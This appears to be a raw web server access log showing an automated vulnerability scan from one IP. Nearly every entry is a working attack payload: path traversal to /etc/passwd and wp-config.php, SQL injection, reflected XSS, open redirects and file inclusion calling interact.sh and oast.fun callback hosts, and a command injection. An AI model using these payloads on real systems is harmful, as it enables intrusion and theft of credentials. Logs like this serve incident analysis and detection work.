flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 411 2023-11-09 13:40:59 103.153.214.94 GET /index.php sl=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 380 2023-11-09 13:41:04 103.153.214.94 GET /view/action/download_file.php filename=../../../../../../../../../etc/passwd&savename=lcsoo.txt 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 396 2023-11-09 13:41:06 103.153.214.94 GET /webui/ g=sys_dia_data_down&file_name=../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 387 2023-11-09 13:41:14 103.153.214.94 POST /cgi-bin/rpc - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 414 2023-11-09 13:41:19 103.153.214.94 GET /upgrade/detail.jsp/login/LoginSSO.jsp id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 389 2023-11-09 13:41:22 103.153.214.94 POST /zentao/user-login.html - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/zentao/user-login.html 405 0 1 383 2023-11-09 13:41:50 103.153.214.94 GET /src/addressbook.php %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 372 2023-11-09 13:41:54 103.153.214.94 GET /src/options.php optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 397 2023-11-09 13:41:55 103.153.214.94 GET /src/search.php mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 383 2023-11-09 13:41:58 103.153.214.94 GET /src/search.php mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 383 2023-11-09 13:41:58 103.153.214.94 POST /mobile/plugin/browser.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 384 2023-11-09 13:42:00 103.153.214.94 GET /index.php option=com_imagebrowser&folder=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 385 2023-11-09 13:42:00 103.153.214.94 GET /src/help.php chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 369 2023-11-09 13:42:30 103.153.214.94 GET /index.php option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 385 2023-11-09 13:42:38 103.153.214.94 GET /phpPgAdmin/index.php _language=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 388 2023-11-09 13:42:45 103.153.214.94 POST /general/index/UploadFile.php m=uploadPicture&uploadType=eoffice_logo&userId 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 866 2023-11-09 13:42:48 103.153.214.94 GET /images/logo/logo-eoffice.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 390 2023-11-09 13:43:47 103.153.214.94 GET /webshell4/login.php errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 393 2023-11-09 13:43:47 103.153.214.94 GET /components/com_ionfiles/download.php file=../../../../../../../../etc/passwd&download=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 1161 2023-11-09 13:43:57 103.153.214.94 GET /components/com_rwcards/captcha/captcha_image.php img=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 371 2023-11-09 13:44:16 103.153.214.94 GET /index.php option=com_pro_desk&include_file=../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 1142 2023-11-09 13:44:34 103.153.214.94 GET /index.php currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 406 2023-11-09 13:44:38 103.153.214.94 GET /_vti_inf.html - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 387 2023-11-09 13:44:45 103.153.214.94 GET /api.php action=logout&forward=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 0 2 2120 2023-11-09 13:45:28 103.153.214.94 GET /users/sign_in - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 381 2023-11-09 13:45:48 103.153.214.94 GET /level/16/exec/show/config/CR - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 392 2023-11-09 13:45:59 103.153.214.94 GET / lang=../../../../../usr/local/php/pearcmd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 2248 2023-11-09 13:46:03 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 365 2023-11-09 13:46:05 103.153.214.94 GET /cs.html url=http://www.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 1127 2023-11-09 13:46:09 103.153.214.94 GET / +config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+Y1A6AHfwBj.log 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 441 2023-11-09 13:46:21 103.153.214.94 POST /uapjs/jsinvoke/ action=invoke 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 2572 2023-11-09 13:46:24 103.153.214.94 GET /2XwNrd5NWk0sBKJO6sCsZgt4uyZ.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 361 2023-11-09 13:46:52 103.153.214.94 GET /comm.php id=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 1135 2023-11-09 13:47:00 103.153.214.94 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 380 2023-11-09 13:47:00 103.153.214.94 GET /horde/util/barcode.php type=../../../../../../../../../../../etc/./passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 385 2023-11-09 13:47:37 103.153.214.94 GET /adm/file.cgi next_file=%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 383 2023-11-09 13:47:37 103.153.214.94 POST /scripts/setup.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 385 2023-11-09 13:47:41 103.153.214.94 GET /index.php option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 1184 2023-11-09 13:47:43 103.153.214.94 GET /CFIDE/wizards/common/_logintowizard.cfm %22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 385 2023-11-09 13:47:43 103.153.214.94 GET /names.nsf/People OpenView 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 400 2023-11-09 13:47:45 103.153.214.94 GET /mail/src/compose.php mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 390 2023-11-09 13:47:51 103.153.214.94 GET /index.php redirect=http%3A%2F%2Fwww.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 405 2023-11-09 13:48:02 103.153.214.94 GET /components/com_moofaq/includes/file_includer.php gzip=0&file=/../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 430 2023-11-09 13:48:05 103.153.214.94 GET /sap/bc/BSp/sap/menu/fameset.htm sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1162 2023-11-09 13:48:38 103.153.214.94 GET /search.htm searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 388 2023-11-09 13:49:02 103.153.214.94 GET /index.php option=com_projectfork§ion=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1157 2023-11-09 13:49:40 103.153.214.94 GET /horde/admin/user.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 389 2023-11-09 13:49:41 103.153.214.94 GET /admin/user.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 301 0 0 380 2023-11-09 13:50:04 103.153.214.94 GET /index.php option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 1149 2023-11-09 13:50:09 103.153.214.94 GET /jira/secure/BrowseProject.jspa id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 415 2023-11-09 13:50:12 103.153.214.94 GET /index.php option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 383 2023-11-09 13:50:21 103.153.214.94 GET /src/redirect.php plugins[]=../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 374 2023-11-09 13:50:46 103.153.214.94 GET /index.php option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 381 2023-11-09 13:50:49 103.153.214.94 GET /redirect.php/"><script>alert(document.domain)</script> subject=server&server=test 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 375 2023-11-09 13:50:49 103.153.214.94 GET /wp-content/plugins/sniplets/view/sniplets/warning.php text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 383 2023-11-09 13:51:02 103.153.214.94 GET /adm/krgourl.php DOCUMENT_ROOT=http://cl6dpm4fe7kdemor970gjat5j3zfhw9xj.oast.fun 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 1092 2023-11-09 13:51:06 103.153.214.94 GET /index.php option=com_omphotogallery&controller=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 388 2023-11-09 13:51:11 103.153.214.94 POST /login.action - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 2885 2023-11-09 13:51:18 103.153.214.94 GET /wp-content/plugins/sniplets/modules/syntax_highlight.php libpath=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1167 2023-11-09 13:51:21 103.153.214.94 GET /index.php appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 393 2023-11-09 13:51:38 103.153.214.94 GET /index.php option=com_kif_nexus&controller=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 383 2023-11-09 13:52:30 103.153.214.94 GET /index.php sl=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 381 2023-11-09 13:52:35 103.153.214.94 GET /wgarcmin.cgi NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 402 2023-11-09 13:52:46 103.153.214.94 GET /index.php option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 376 2023-11-09 13:52:50 103.153.214.94 GET /exchweb/bin/redir.asp URL=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 8 0 378 2023-11-09 13:52:52 103.153.214.94 GET /CookieAuth.dll GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 404 2023-11-09 13:53:15 103.153.214.94 GET /index.php option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 362 2023-11-09 13:53:25 103.153.214.94 GET /plugins/content/jw_allvideos/includes/download.php file=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 383 2023-11-09 13:53:25 103.153.214.94 GET /src/addressbook.php %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1180 2023-11-09 13:53:28 103.153.214.94 GET /src/options.php optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 398 2023-11-09 13:53:31 103.153.214.94 GET /src/search.php mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 1212 2023-11-09 13:53:37 103.153.214.94 GET /src/search.php mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 384 2023-11-09 13:53:40 103.153.214.94 GET /src/help.php chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 382 2023-11-09 13:53:42 103.153.214.94 GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php files[]=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 385 2023-11-09 13:53:47 103.153.214.94 GET /awstats/awredir.pl url=interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 374 2023-11-09 13:53:48 103.153.214.94 GET /cgi-bin/awstats/awredir.pl url=interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 375 2023-11-09 13:53:56 103.153.214.94 GET /index.php option=com_imagebrowser&folder=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 396 2023-11-09 13:54:35 103.153.214.94 GET /index.php option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 381 2023-11-09 13:55:07 103.153.214.94 POST /axis2-admin/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 411 2023-11-09 13:55:11 103.153.214.94 POST /axis2/axis2-admin/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 385 2023-11-09 13:55:32 103.153.214.94 GET /index.php option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 64 385 2023-11-09 13:55:35 103.153.214.94 GET /index.php option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 389 2023-11-09 13:55:41 103.153.214.94 GET /components/com_ionfiles/download.php file=../../../../../../../../etc/passwd&download=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1179 2023-11-09 13:55:41 103.153.214.94 GET /index.php option=com_gcalendar&controller=../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 398 2023-11-09 13:55:45 103.153.214.94 GET /index.php option=com_jcollection&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 1155 2023-11-09 13:56:20 103.153.214.94 GET /index.php option=com_cartweberp&controller=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 387 2023-11-09 13:56:23 103.153.214.94 GET /index.php option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 383 2023-11-09 13:56:32 103.153.214.94 GET /index.php option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 394 2023-11-09 13:56:35 103.153.214.94 GET /webshell4/login.php errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 395 2023-11-09 13:56:42 103.153.214.94 GET /index.php currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 376 2023-11-09 13:56:47 103.153.214.94 GET /index.php option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 2082 2023-11-09 13:56:54 103.153.214.94 GET /components/com_rwcards/captcha/captcha_image.php img=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 